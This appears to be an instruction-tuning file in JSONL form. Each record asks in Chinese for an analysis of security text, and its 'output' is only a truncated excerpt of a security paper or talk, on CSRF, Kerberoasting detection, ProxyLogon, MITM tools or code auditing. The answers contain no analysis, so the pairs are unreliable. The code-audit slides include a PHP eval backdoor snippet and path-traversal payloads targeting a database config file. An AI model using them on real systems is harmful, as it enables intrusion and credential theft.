{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBreak, Memory By Richard Thieme The Evolution of the Problem The problem was not that people couldnt remember; the problem was that people couldnt forget. As far back as the 20th century, we realized that socio-historical problems were best handled on a macro level. It was inefficient to work on individuals who were, after all, nothing but birds in digital cages. Move the cage, move the birds. The challenge was to build the cage big enough to create an illusion of freedom in flight but small enough to be moved easily. When long-term collective memory became a problem in the 21st century, it wound up on my desktop. There had always been a potential for individuals to connect the dots and cause a contextual shift. We managed the collective as best we could with Chomsky Chutes but an event could break out randomly at any time like a bubble bursting. As much as we surveil the social landscape with sensors and datamine for deep patterns, we cant catch everything. Its all sensors and statistics, after all, which have limits. If a phenomenon gets sticky or achieves critical mass, it can explode through any interface, even create the interface it needs at the moment of explosion. That can gum up the works. 2 Remembering and forgetting changed after writing was invented. The ones that remembered best had always won. Writing shifted the advantage from those who knew to those who knew how to find what was known. Electronic communication shifted the advantage once again to those who knew what they didnt need to know but knew how to get it when they did. In the twentieth century advances in pharmacology and genetic engineering increased longevity dramatically and at the same time meaningful distinctions between backward and forward societies disappeared so far as health care was concerned. The population exploded everywhere simultaneously. People who had retired in their sixties could look forward to sixty or seventy more years of healthful living. As usual, the anticipated prob", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAntivirus Bypass Techniques Learn practical techniques and tactics to combat, bypass, and evade antivirus software Nir Yehoshua Uriel Kosayev BIRMINGHAMMUMBAI Antivirus Bypass Techniques Copyright  2021 Packt Publishing All rights reserved. No part of this book may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, without the prior written permission of the publisher, except in the case of brief quotations embedded in critical articles or reviews. Every effort has been made in the preparation of this book to ensure the accuracy of the information presented. However, the information contained in this book is sold without warranty, either express or implied. Neither the authors, nor Packt Publishing or its dealers and distributors, will be held liable for any damages caused or alleged to have been caused directly or indirectly by this book. Packt Publishing has endeavored to provide trademark information about all of the companies and products mentioned in this book by the appropriate use of capitals. However, Packt Publishing cannot guarantee the accuracy of this information. Group Product Manager: Wilson Dsouza Publishing Product Manager: Mohd Riyan Khan Senior Editor: Rahul Dsouza Content Development Editor: Sayali Pingale Technical Editor: Sarvesh Jaywant Copy Editor: Safis Editing Project Coordinator: Ajesh Devavaram Proofreader: Safis Editing Indexer: Pratik Shirodkar Production Designer: Alishon Mendonca First published: June 2021 Production reference: 1180721 Published by Packt Publishing Ltd. Livery Place 35 Livery Street Birmingham B3 2PB, UK. 978-1-80107-974-7 www.packt.com Recommendation \"Antiviruses have always been a hindrance for threat actors and red teamers. The book Antivirus Bypass Techniques illustrates various techniques that attackers can use to evade antivirus protection. This book is a must-read for red teamers.\"  Abhijit Mohanta, author of Malware analysis and Detection Engineering and Preventing Ransomwa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDynamic Cross-Site Request Forgery A Per-Request Approach to Session Riding By Nathan Hamiel and Shawn Moyer July 24, 2009 Revision 1 Dynamic Cross-Site Request Forgery http://www.hexsec.com Abstract Cross-Site Request Forgery (CSRF) is typically described as a replay or static type of attack, where a bad actor uses markup, Javascript, or another method to force a client browser to perform a known, repeatable in-session transaction on the affected site without the users knowledge. Typical defensive measures against CSRF address this by creating unique, per-session or per-request tokens that arent typically available to an attacker, and by checking for other browser behaviors such as referring URL. In this paper we describe a number of approaches to construct dynamic CSRF attacks, forging unique requests on an automated, per-target basis, even in scenarios where Cross-Site Scripting or Cross-Domain issues dont exist. Classical Cross-Site Request Forgery Pete Watkins coined the term Cross-Site Request Forgery in a post to Bugtraq in 20011, for what had been described in 1988 by Norm Hardy as the Confused Deputy2, in reference to similar problems with compilers and timesharing systems. The fundamental premise of CSRF is this: In the course of web browsing, a target user encounters a request from a malicious site or location that makes a request on behalf of the user to a site the user is already authenticated to. A forged request could be in the form of an HTML tag such as an IMG, IFRAME, or META refresh, embedded in Javascript or Flash, or sent as a 300-series HTTP redirect from a location under the attackers control. If the target user is authenticated, relevant HTTP headers and any authentication data are sent to the site along with the malicious request. From Watkins 2001 Bugtraq post: Dynamic Cross-Site Request Forgery http://www.hexsec.com 2 1 http://www.tux.org/~peterw/csrf.txt 2 http://www.cis.upenn.edu/~KeyKOS/ConfusedDeputy.html CSRF does not in any way rely ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2020-2021年 元宇宙发展研究报告 @新媒沈阳 团队 王儒西 博士后 向安玲 博士生 主笔 0.98版 2021.09.1 6 理念篇 目 录 1. 孕育元宇宙 2. 元宇宙是什么 3.虚拟与现实的关系 4. 元宇宙的理论框架 5. 对元宇宙的几点展望 1 孕育元宇宙 元宇宙前传雪崩 元宇宙概念的提出 1992 年Neal Stephenson的科幻小说Snow Crash中提 出 了 metaverse元宇宙汉译本译为超元域和化身 Avatar这两个概念书中情节发生在一个现实人类通过 VR设备与虚拟人共同生活在一个虚拟空间的未来设定中 元宇宙前传雪崩 现在阿弘正朝大街走去那是超元域元宇宙的百老汇超元域的香榭丽舍大道它是一条 灯火辉煌的主干道反射在阿弘的目镜中能够被眼睛看到能够被缩小被倒转它并不真正存在 但此时那里正有数百万人在街上往来穿行计算机协会全球多媒体协议组织的忍者级霸主们都 是绘制电脑图形的高手正是他们精心制定出协议确定了大街的规模和长度大街仿佛是一条通衢 大道环绕于一颗黑色球体的赤道之上这颗球体的半径超过一万公里而大街更是长达六万五千五 百三十六公里远比地球赤道长得多  这条大街与真实世界唯一的差别就是它并不真正存在它只是一份电脑绘图协议写在一张纸上 放在某个地方大街连同这些东西没有一样被真正赋予物质形态更确切地说它们不过是一些 软件通过遍及全球的光纤网络供大众使用当阿弘进入超元域纵览大街当他看着楼宇和电子标 志牌延伸到黑暗之中消失在星球弯曲的地平线之外他实际上正盯着一幕幕电脑图形表象即一个 个用户界面出自各大公司设计的无数各不相同的软件若想把这些东西放置在大街上各家大公司 必须征得全球多媒体协议组织的批准还要购买临街的门面土地得到分区规划许可获得相关 执照贿赂检查人员等等等等这些公司为了在大街上营造设施而支付的钱全部流入由全球多媒体 协议组织拥有和运营的一项信托基金用于开发和扩充机器设备维持大街继续存在 Snow Crash 1994 Web World 第一个轴测图界面 的多人社交游戏 用户可以实时聊天 旅行改造游戏世 界开启了游戏中 的UGC模式 元宇宙前传开放多人游戏 1995 Worlds Incorporate d 第一个投入市场的 3D界面MMO强 调开放性世界而非 固定的游戏剧本 1995 Active Worlds 基于小说雪崩 创作以创造一个 元宇宙为目标提 供了基本的内容创 作工具来改造虚拟 环境 1979 MUDs MUSHe s 第一个文字交互界 面的将多用户联 系在一起的实时开 放式社交合作世界 1986 Habitat 第一个2D图形界 面的多人游戏环境 首次使用了化身 avatar也是第一 个投入市场的 MMORPG Second Life第一个现象级的虚拟世界 发布于2003年拥有更强的世界编辑功能与发达的虚拟经济系统吸引了大量企业与教育 机 构开发团队称它不是一个游戏没有可以制造的冲突没有人为设定的目标人们 可以 在其中社交购物建造经商在Twitter诞生前 BBC路透社 CNN等报社将 Second Life作为发布平台IBM曾在游戏中购买过地产建立自己的销售中心瑞典 等 国家在游戏中建立了自己的大使馆西班牙的政党在游戏中进行辩论 元宇宙前传Second Life 游戏拥有自己的货币 Linden Dollar可 以 以一定汇率兑换法定货 币游戏用户Anshe Chung通过买卖经营虚 拟地产在两年时间里 赢得了一百万美元的现 实资产成为第一个虚 拟世界中的百万富翁 2020人类社会虚拟化的临界点 疫情加速社会虚拟化 新冠疫情隔离政策下全社会上网时长大幅增长宅经济快速发展 从例外状态到常态 线上生活由原先短时期的例外状态成为了常态由现实世界的补充变成了与现实世界的平行世界 认知改变 虚拟的并不是虚假的更不是无关紧要的 生活迁移 线上与线下打通人类的现实生活开始大规模向虚拟世界迁移人类成为现实与数字的两栖物种 2021元宇宙元年 1979 文字界面开放 世界 1986 2 D 图形界面 M M O 1992 雪崩提出 元 宇宙 和 化身 概念 2003 Second Life 2006 Roblox 2017 For tnite 2021 元宇宙元年 2021年可以被称为元宇宙元年 元宇宙呈现超出想象的爆发力其 背 后是相关元宇宙要素的群聚效 应 Critical Mass近似1995年互联 网 所经历的群聚效应 朱嘉明 1995 3 D界面MMO 2 元宇宙是什么 元宇宙是一个平行于现实世界又独立于现实 世界的虚拟空间是映射现实世界的在线虚拟 世界是越来越真实的数字虚拟世界朱 嘉明 元宇宙至少包括以下要素身份朋友沉浸 感低延迟多元化随地经济系统和文明 Roblox CEO", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1558-003-win-kerberosing ## 来自ATT&CK的描述 服务主体名称SPN用于唯一标识Windows服务的每个实例为了启用身份验证Kerberos要求SPN与至少一个服务登录帐户专门用于运行服务的帐户相关 拥有有效的Kerberos票证授予票证TGT的攻击者可以向域控制器DC请求任何SPN的一个或多个Kerberos票证授予服务TGS服务票证可以使用RC4算法对这些票证的一部分进行加密这意味着与SPN相关联的服务帐户的Kerberos 5 TGS-REP etype 23哈希将用作私钥因此容易受到离线暴力破解攻击可能暴露明文凭据的攻击 可以使用从网络流量中捕获的服务票证执行相同的攻击 ## 测试案例 PowerSploit Empire ## 检测日志 windows 安全日志 netflow流量 ## 测试复现 暂无 ## 测试留痕 暂无 ## 检测规则/思路 ### sigma规则 ```yml title: kerberos 弱加密 description: 域环境测试 references: https://adsecurity.org/?p=3458 status: experimental author: 12306Bro logsource: product: windows service: security detection: selection: EventID: 4769 #kerberos服务票证请求 TicketOptions: 0x40810000 #附加信息>票证选项 TicketEncryptiontype: 0x17 #附加信息>票证加密类型 reduction: - ServiceName: '$*' #服务名称>服务信息 condition: selection and not reduction level: medium ``` ### 建议 暂无 ## 相关TIP [[T1558-003-win-SPN-凭证转储]] ## 参考推荐 MITRE-ATT&CK-T1558-003 <https://attack.mitre.org/techniques/T1558/003> 检测kerberosing活动 <https://adsecurity.org/?p=3458>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Riskv and Reward (reversing, 80p) > open-source all the things!!! We solved this task in a fun way. Running `file` command on the supplied binary informed us that it's an ELF for RISC-V architecture. We couldn't run it directly on our computer and installing an emulator was annoying (it didn't work for some reason). So, we solved it in a blackbox way! Running `strings -n 20 riskv_and_reward` gave us only one string: ``` tjb3csFt0rrutrh_wiv5__fi}k_1ih`{xIcrhsoyBmyw1CyT3rvxStT_jq40_zrq( ``` Although it seems quite messed up, we quickly noticed it has some resemblance to the flag format: it has two curly braces, and all the capital letters from `BITSCTF`. It seems it was permutated in some way. So, the only thing left to do was reversing the permutation. Running `hexdump` on the binary, we found an interesting part right after the aforementioned string: ``` 00001080 28 00 00 00 21 00 00 00 2f 00 00 00 34 00 00 00 |(...!.../...4...| 00001090 2d 00 00 00 36 00 00 00 06 00 00 00 1f 00 00 00 |-...6...........| 000010a0 25 00 00 00 3b 00 00 00 29 00 00 00 03 00 00 00 |%...;...).......| 000010b0 37 00 00 00 3e 00 00 00 1b 00 00 00 05 00 00 00 |7...>...........| 000010c0 22 00 00 00 13 00 00 00 14 00 00 00 3a 00 00 00 |\"...........:...| 000010d0 31 00 00 00 30 00 00 00 1a 00 00 00 10 00 00 00 |1...0...........| 000010e0 08 00 00 00 23 00 00 00 07 00 00 00 24 00 00 00 |....#.......$...| 000010f0 3c 00 00 00 2c 00 00 00 00 00 00 00 18 00 00 00 |<...,...........| 00001100 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |C...............| ``` We noticed every number appears just once, so this was probably a transposition table. From now on, we had to just write a simple script to apply the permutation to get the flag.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n@glennzw // DefCon 22 August 2014 Digital Terrestrial Tracking: The Future of Surveillance Glenn Wilkinson SensePost @glennzw glenn@sensepost.com ABSTRACT In this paper, the terms Digital Terrestrial Tracking (DTT) and Digital Terrestrial Footprint (DTF) are introduced. The DTF defines the uniquely identifiable signature of wireless signals emitted by a device or collection of devices that an individual carries on their person in the physical world. These signals can reveal a devices history at a location and point in time, and potentially disclose details about the owner. Interrogation or interaction with the device may reveal further details. The DTF positions itself between an individuals physical world footprint (their unique personal attributes), and their online footprint (defined by their unique online persona). Physical world tracking would involve following a person based on what they look or sound like; online tracking would involve tracking a person online activity based on their unique online signature (cookies, IP addresses, social media accounts); and digital terrestrial tracking involves tracking a person in the real world based on a unique signature emitted by devices on their person. The goal of the research conducted and discussed in this paper was to build a mass data collection and correlation framework based on information leaked from the wireless devices that people carry. The framework should be able to identify, track, and profile people by passively collected wireless information from devices, and collect information that is more verbose by optionally interrogating devices. The result is a tool, named Snoopy, written in Python, capable of operating in a distributed manner, in harsh environments on affordable off the shelf (OTS) hardware. Snoopy is able to draw specific and high level conclusions about individuals based on their digital wireless signals. The framework has been extensively tested in busy public areas (such as conferences, airp", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## 2. 命令Command ### Intent 将命令封装成对象中具有以下作用 - 使用命令来参数化其它对象 - 将命令放入队列中进行排队 - 将命令的操作记录到日志中 - 支持可撤销的操作 ### Class Diagram - Command命令 - Receiver命令接收者也就是命令真正的执行者 - Invoker通过它来调用命令 - Client可以设置命令与命令的接收者 <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/c44a0342-f405-4f17-b750-e27cf4aadde2.png\"/> </div><br> ### Implementation 设计一个遥控器可以控制电灯开关 <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/e6bded8e-41a0-489a-88a6-638e88ab7666.jpg\"/> </div><br> ```java public interface Command { void execute(); } ``` ```java public class LightOnCommand implements Command { Light light; public LightOnCommand(Light light) { this.light = light; } @Override public void execute() { light.on(); } } ``` ```java public class LightOffCommand implements Command { Light light; public LightOffCommand(Light light) { this.light = light; } @Override public void execute() { light.off(); } } ``` ```java public class Light { public void on() { System.out.println(\"Light is on!\"); } public void off() { System.out.println(\"Light is off!\"); } } ``` ```java /** * 遥控器 */ public class Invoker { private Command[] onCommands; private Command[] offCommands; private final int slotNum = 7; public Invoker() { this.onCommands = new Command[slotNum]; this.offCommands = new Command[slotNum]; } public void setOnCommand(Command command, int slot) { onCommands[slot] = command; } public void setOffCommand(Command command, int slot) { offCommands[slot] = command; } public void onButtonWasPushed(int slot) { onCommands[slot].execute(); } public void offButtonWasPushed(int slot) { offCommands[slot].execute(); } } ``` ```java public class Client { public static void main(String[] args) { Invoker invoker = new Invoker(); Light light = new Light(); Command lightOnCommand = new LightOnCommand(light); Command lightOffCommand = new LightOffCommand(light); invoker.setOnCommand(lightOnCommand, 0); invoker.setOffCommand(lightOffCommand, 0); invoker.onButtonWasPush", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n*https://www.hpe.com/us/en/insights/articles/medical-device-security-hacking-prevention-measures-1806.html                             PM PM CMS PM CMS Data Packets                   CMS Opens Channel SYN CMS Opens Channel SYN PM SYN, ACK CMS Opens Channel SYN PM SYN, ACK CMS Opens Channel SYN PM SYN, ACK CMS ACK CMS Opens Channel SYN PM SYN, ACK CMS ACK PM What port you want to use? CMS Opens Channel SYN PM SYN, ACK CMS ACK PM What port you want to use? CMS This one! 3627 CMS Opens Channel SYN PM SYN, ACK CMS ACK PM What port you want to use? CMS This one! 3627 PM Ok, Here some Data! 1. 2. 1. 3.              Heartbeat Value (80 base 10) Heartbeat Value (80 base 10) Kali Box MAC Heartbeat Value (120 base 10)     Fictitious cardiac rhythms, even intermittent, could lead to extended hospitalization, additional testing, and side effects from medications to control heart rhythm and/or prevent clots. The hospital could also suffer resource consumption. - Dr. S. Nordeck Fictitious intermittent cardiac rhythms Fictitious intermittent cardiac rhythms Blood Pressure Normal? Fictitious intermittent cardiac rhythms Blood Pressure Normal? If PM monitor was modified Fictitious intermittent cardiac rhythms Blood Pressure Normal? If PM monitor was modified Fictitious intermittent cardiac rhythms Blood Pressure Normal? Medications Administered If PM was modified", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nModule 1 A journey from high level languages, through assembly, to the running process https://github.com/hasherezade/malware_training_vol1 Wow64: 32 bit PE on 64 bit Windows WoW64: basics  Backward compatibility: running 32 bit applications on 64 bit Windows  32 bit application must be isolated from the 64 bit evironment  WoW64 is a special subsystem that provides the 32 bit environment on Windows 64 bit WoW64: basics  SysWow64 contains 32 bit equivalents of the DLLs that can be found in System32: WoW64: basics  But Ntoskrnl.exe has only one version  native (64 bit on 64 bit system) WoW64: basics  The following 64 bit DLLs are loaded in every 32 bit process runing on Wow64:  WoW64Cpu.dll  an emulator to run 32 bit code on 64 bit processor  Wow64.dll  core emulation infrastructure, thunks to Ntoskrnl.exe entry-point functions  Wow64Win.dll  thunks to Win32k.sys entry-point functions  Ntdll.dll (64bit version) WoW64: basics  Each 32 bit process runing on Wow64 has 2 versions of NTDLL  32-bit (from SysWow64) and 64 bit (from System32) NTDLL.DLL (32 bit version) NTDLL.DLL (64 bit version) WoW64: basics MyApp.exe (32-bit) Kernel32.dll (32-bit) Ntdll.dll (32-bit) Ntdll.dll (64bit) Wow64Cpu,dll (64-bit) Wow64Win,dll (64-bit) MyApp.exe (64-bit) Kernel32.dll (64-bit) NtosKrnl (kernel) Syscalls Pass through emulation 32 bit TEB 32 bit PEB 64 bit TEB 64 bit PEB 64 bit TEB 64 bit PEB Wow64,dll (64-bit) Win32k.sys WoW64: basics  Try scanning a demo_1.exe with PE-sieve: 64 bit version, and then 32 bit version  Observe that:  The 32 bit version can access only the 32 bit modules  The 64 bit version can access both 32 and 64 bit modules WoW64  Wow64 can be compared to a Sandbox 32 bit process 64 bit wrapper process 64 bit process WoW64  How to break this isolation? 32 bit process 64 bit wrapper process 64 bit process ? ? How is the isolation made?  The 32 bit and 64 bit code execution is accessible via different address of the code segment  32 bit: 0x23  64 bit: 0x33  How to chage", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCopyright  Government Technology Agency. Not to be reproduced without permission. Hacking Humans with AI as a Service Eugene Lim, Glenice Tan, Tan Kee Hock, Timothy Lee DEF CON 29 Disclaimer Materials presented are based on research conducted. Not to be attributed to any entity. Copyright  Government Technology Agency. Not to be reproduced without permission. Meet the Team Eugene Lim @spaceraccoonsec AppSec and Vulnerability Research With a dash of white hat hacking Digital Humanities and Web Development History and Computer Science, Yale University 2 Copyright  Government Technology Agency. Not to be reproduced without permission. Meet the Team Glenice Tan Red Team and Social Engineering Plus a focus on web security and cloud Data Analysis and Vulnerability Research Information Security, National University of Singapore 3 Copyright  Government Technology Agency. Not to be reproduced without permission. 4 Meet the Team Red Team and Cyber Engineering Loves Capture the Flag competitions Data Security and Automation Information Systems, Singapore Management University Tan Kee Hock Copyright  Government Technology Agency. Not to be reproduced without permission. 5 Meet the Team Timothy Lee Mobile Pentest and Red Team Plus reverse engineering Web Development and Cybersecurity Computer Science, Nanyang Technological University Copyright  Government Technology Agency. Not to be reproduced without permission. 6 Overview Hacking Humans: The Traditional way The AI Market Landscape Conclusion 01 02 Defenses against the Dark Arts: Protecting the Humans Hacking Humans: The AI way 03 04 05 Copyright  Government Technology Agency. Not to be reproduced without permission. Hacking Humans - The Traditional Way Social Engineering 101 7 Copyright  Government Technology Agency. Not to be reproduced without permission. 8 Social Engineering 101  Social Engineering refers to the psychological manipulation of people into performing actions or divulging information.  Common Influencing Tactic", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nInjecting RDS-TMC Traffic Information Signals Injecting RDS-TMC Traffic Information Signals Copyright 2007 Inverse Path Ltd. DEFCON 15 Las Vegas, August 3-5 2007 Andrea Barisani Chief Security Engineer <andrea@inversepath.com> http://www.inversepath.com Daniele Bianco Hardware Hacker <daniele@inversepath.com> Introduction DISCLAIMER: All the scripts and/or commands and/or configurations and/or schematics provided in the presentation must be treated as examples, use the presented information at your own risk. Copyright 2007 Inverse Path Ltd. Andrea Barisani <andrea@inversepath.com> Daniele Bianco <daniele@inversepath.com> This work is released under the terms of the Creative Commons Attribution-NonCommercial-NoDerivs License available at http://creativecommons.org/licenses/by-nc-nd/3.0. Injecting RDS-TMC Traffic Information Signals Copyright 2007 Inverse Path Ltd. What's this all about ?  Modern In-Car Satellite Navigation systems are capable of receiving dynamic traffic information  One of the systems being used throughout Europe and North America is RDS-TMC (Radio Data System  Traffic Message Channel)  One of the speakers bought a car featuring one of these SatNavs...he decided to play with it...just a little...  We'll show how RDS-TMC information can be hijacked and falsified using homebrew hardware and software Injecting RDS-TMC Traffic Information Signals Copyright 2007 Inverse Path Ltd. Why bother ?  First of all...hardware hacking is fun and 0wning a car is priceless ;-P  it's so 80s  ok seriously...Traffic Information displayed on SatNav is implicitly trusted by drivers, nasty things can be attempted  more important: chicks will melt when you show this... Injecting RDS-TMC Traffic Information Signals Copyright 2007 Inverse Path Ltd. The Radio Data System  RDS is used for transmitting data over FM (1187.5 bits/s)  Described in European Standard EN50067 (April 1998)  Its most prominent function is showing FM Channel Name on the radio display, also used for Alte", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWalk into Starbucks, plop down a laptop, click start, watch the credentials roll in. Enter Subterfuge, a Framework to take the arcane art of Man-in-the-Middle Attacks and make it as simple as point and shoot. Subterfuge demonstrates vulnerabilities in the ARP Protocol by harvesting credentials that go across the network, and even exploiting machines through race conditions. Now walk into a corporation A rapidly-expanding portion of todays Internet strives to increase personal efficiency by turning tedious or complex processes into a framework which provides instantaneous results. On the contrary, much of the information security community still finds itself performing manual, complicated tasks to administer and protect their computer networks. The purpose of this publication is to discuss a new Man-In-The-Middle attack tool called Subterfuge. Subterfuge is a simple but devastatingly effective credential- harvesting program, which exploits vulnerabilities in the inherently trusting Address Resolution Protocol. It does this in a way that even a non-technical user would have the ability, at the push of a button, to attack all machines connected to the network. Subterfuge further provides the framework by which users can then leverage a MITM attack to do anything from browser/service exploitation to credential harvesting, thus equipping information and network security professionals and enthusiasts alike with a sleek push-button security validation tool. Abstract: Christopher M. Shields r00t0v3rr1d3 Matthew M. Toussain 0sm0s1z He who is prudent and lies in wait for an enemy who is not, will be victorious. -Sun Tzu Enter Subterfuge, a Framework for Man-in-the-Middle Attacks, where credentials are up for the taking. The Framework 4 Enter Subterfuge, an Easier Way to See the Unseen 1 The MITM Framework Give me the numbers. How bad is MITM really? The state of security on the Local Area Network and why you should be concerned. Walk into Starbucks, plop down a laptop, click ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Proxy Era of Microsoft Exchange Server Orange Tsai Orange Tsai  Orange Tsai, focusing on Web and Application 0-day research  Principal Security Researcher of DEVCORE  Captain of HITCON CTF Team  Speaker of Security Conferences  Black Hat USA & ASIA / DEFCON / HITB / HITCON   Selected Awards and Honors:  2017 - 1st place of Top 10 Web Hacking Techniques  2018 - 1st place of Top 10 Web Hacking Techniques  2019 - Winner of Pwnie Awards \"Best Server-Side Bug\"  2021 - Champion and \"Master of Pwn\" of Pwn2Own  2021 - Winner of Pwnie Awards \"Best Server-Side Bug\" Why Target Exchange Server? 1. Mail servers always keep confidential secrets and Exchange Server is the most well-known mail solution for enterprises and governments worldwide 2. Has been the target for Nation-sponsored hackers for a long time (Equation Group) 3. More than 400,000 Exchange servers exposed on the Internet according to our survey Our Works  We focus on the Exchange architecture and discover a new attack surface that no one proposed before. That's why we can pop 0days easily!  We discovered 9 vulnerabilities that covered server-side, client-side, and crypto bugs through this new attack surface, and chained into 4 attacks: 1. ProxyLogon: The most well-known pre-auth RCE chain 2. ProxyOracle: A plaintext-password recovery attacking chain 3. ProxyShell: The pre-auth RCE chain we demonstrated at Pwn2Own 2021 4. ProxyRelay: A pre-auth authentication bypass to read all the victim's mails The Proxy Era of MS Exchange ProxyLogon  CVE-2021-26855  CVE-2021-27065 ProxyNotFound  CVE-2021-28480  CVE-2021-28481 ProxyToken  CVE-2021-33766 ProxyOracle  CVE-2021-31195  CVE-2021-31196 ProxyRelay  CVE-2021-33768  CVE-2021-TBA ProxyShell  CVE-2021-34473  CVE-2021-34523  CVE-2021-31207 Exchange Architecture Backend Server Frontend Server 2000/2003 Mailbox Role Client Access Role Hub Transport Role Unified Messaging Role Edge Transport Role 2007/2010 Mailbox Role Client Access Role Edge Transport Role 2013 Edge Transpo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBitTorrent Protocol Abuses Written by Michael Brooks and David Aslanian Introduction The BitTorrent protocol is now 7 years old. The protocol has become wildly successful in a very short period of time, but with this success comes growing pains. The protocol originally envisioned by Bram Cohen is fairly secure. Vulnerabilities have been introduced by people trying to do things with the protocol that it was never meant to do. BitTorrent was never meant to be an exclusive protocol; however private BitTorrent networks are increasing in popularity. Most vulnerabilities can be identified by a Common Vulnerability and Exposure (CVE) number. Currently there are 36,976 vulnerabilities classified by this systemi. Most CVE numbers fall into specific categories and given a Common Weakness Enumeration (CWE) number. For instance, all SQL Injection Vulnerabilities are classified by CWE-89. In the current BitTorrent Specification there are three CWE violations. Immortal Sessions All private BitTorrent communities are vulnerable to CWE-384ii (Session fixation) which ranks in at Number 7 of the OWASP top 10iii. All BitTorrent Clients authenticate with private trackers using a session ID sent as a GET parameter. This value cannot be changed because there is no system in the protocol to notify the BitTorrent client of a new Session ID. One could exploit this vulnerability by sniffing the network for announce requests or .torrent files. Another tried and true method is XSS in the web application. Due to this session fixation vulnerability, SQL Injection in the tracker leads to immediate access without need to break a password hash. Often immortal session Ids are a password hash, which is the case with many of the private BitTorrent networks. Password hashes should always be kept secret. The hashing of passwords is meant to be a last line of defense after the database has been compromised, but many programmers don't understand this principle. Client Side Trust Another vulnerability that", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n老司机独家代码审计姿势 --色豹 目录 代码审计介绍 代码审计流程思路 web应用代码审计 IOT固件代码审计 1 2 3 4 代码审计介绍 代码审计Code audit是一种以发 现程序错误安全漏洞和违反程序规 范为目标的源代码分析 什么是代码审计 代码审计工具 Fortify SCA Checkmarx CxSuite RIPS 厂商 Fortify Software Checkmarx rips 支持语言 Java,JSP,ASP.NET,C#, VB.NET,C,C++,COB OL, ColdFusion,Transac t-SQL, PL/SQL,JavaScript/ Ajax, Classic,ASP,VBScript, VB6,PHP JAVAASP.NET C#VB.NET JavaScriptJscript C/C++APEX PHP 风险种类 400种 300种 参考CWE 报价 100万/软件 70万/软件 免费版 性价比 中 高 高 代码审计的意义 提高应用 软件源代 码质量 避免应用 系统潜在 后门危害 提升系统 本身的安 全性 挖掘渗透 测试触及 不到的地 方 代码审计流程思路 代码审计思路 根据敏感关键字 回溯参数传递过程 查找可控变量 正向追踪变量传递过程 寻找敏感功能点 通读功能点代码 直接通读全文代码 代码审计思路 敏感关键字 一段简单的代码 <?php eval($_GET[a]); 命令执行漏洞 敏感关键字 一段复杂的代码 <?php  //1000行 eval($_GET[a]); //1000行 ?> 敏感关键字 一段复杂的代码 <?php  //1000行 eval($_GET[a]); //1000行 ?> 正则表达式 \\beval\\(\\$_(GET|POST) 敏感关键字 一段复杂的代码 <?php  //1000行 eval($_GET[a]); //1000行 ?> 正则表达式 \\beval\\(\\$_(GET|POST) 可控变量 一切用户可控的输入都是有害的 $_GET$_POST$_REQUEST$_COOKIE 用户可控的变量 可控变量 一段简单的代码 <?php echo($_GET[a]); XSS漏洞 可控变量 一段复杂的代码 <?php  //1000行 echo($_GET[a]); //1000行 ?> 正则表达式 \\becho\\(\\$_(GET|POST) 敏感功能 文件上传功能GETSHELL 上传黑白名单,content-type上传大小 敏感功能 敏感功能 if (file_exists(\"upload/\" . $_FILES[\"file\"][\"name\"])) { echo $_FILES[\"file\"][\"name\"] . \" already exists. \"; } else { move_uploaded_file($_FILES[\"file\"] [\"tmp_name\"],\"upload/ \" . $_FILES[\"file\"][\"name\"]); echo \"Stored in: \" . \"upload/\" . $_FILES[\"file\"][\"name\"]; } 敏感功能 move_uploaded_file 将上传的文件移动到新位置的函数 审计移动前函数的过滤 通读程序代码 通读程序代码 熟悉整体架构 覆盖逻辑漏洞 掌握程序流程 通读代码优点 通读程序代码 代码量庞大 审计时间过长 投入产出 通读代码缺点 Web应用代码审计 过滤不完善 过滤不完善 过滤不完善 画蛇添足 画蛇添足 1, 绕过过滤selselectect- >select 2,没有过滤\\虽然前面用 了addslashes, 但是后面又把单引号置 空了 3, '\\-->addslashes-->\\'\\\\--> 单引号置空-->\\\\\\ 4, 必备条件两个连续的 可控点 第一个引入\\第二个 参数payload 画蛇添足 实际执行SQL语句 补丁的绕过与修复 补丁的绕过与修复 Payload?dir=..././http/..././config/config_db.php 补丁的绕过与修复 Payload?dir=.....///http/.....///config/config_db.php 补丁的绕过与修复 dir参数必须以http开头 Payload?dir=http/.....///.....///config/config_db.php 补丁的绕过与修复 使用strpos函数查找./首次出现的位置windows用..\\ Payload?dir=http\\..\\..\\config\\config_db.php 补丁的绕过与修复 放弃修复删文件 IOT固件代码审计 ", "category": "text_analysis", "source": "security_papers"}
